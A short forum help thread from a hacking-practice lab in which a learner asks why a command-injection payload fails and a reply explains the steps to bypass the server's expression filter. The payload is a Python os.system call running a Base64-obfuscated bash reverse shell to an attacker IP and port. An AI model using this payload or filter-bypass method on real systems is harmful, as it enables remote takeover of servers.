Hi guys
I am doing the Black Box labs and I am stuck on delivirng the payload to the vuln server. I am alwayd getting “Invalid Expression”.
I have changed the IP upon creating the exploit. I have used both the clipboard and direct to send the payload, I have changed to other instances but I am still getting the error.
Could someone help me?
Payload used:
__import__("os").system("echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTk2Ljg1LjIvNDQ0NCAwPiYxIgo= | base64 -d | bash")
Hello,
Please make sure that you follow the instructions and techniques in the solutions tab chronologically.
The reason you are getting the error “Invalid Expression” is because you did not modify the API.py script and push the changes with Git.
The API.py script running on the web server has been configured to filter certain expressions, that is why you will need to modify it and push it to the server to be able to perform command injection.
Furthermore, ensure that you modify the IP address in the bash one-liner with the IP address of your Kali system before encoding it in Base64.
If you follow the steps correctly, you will obtain a reverse shell on your Netcat listener without any issue as highlighted in the following screenshot.
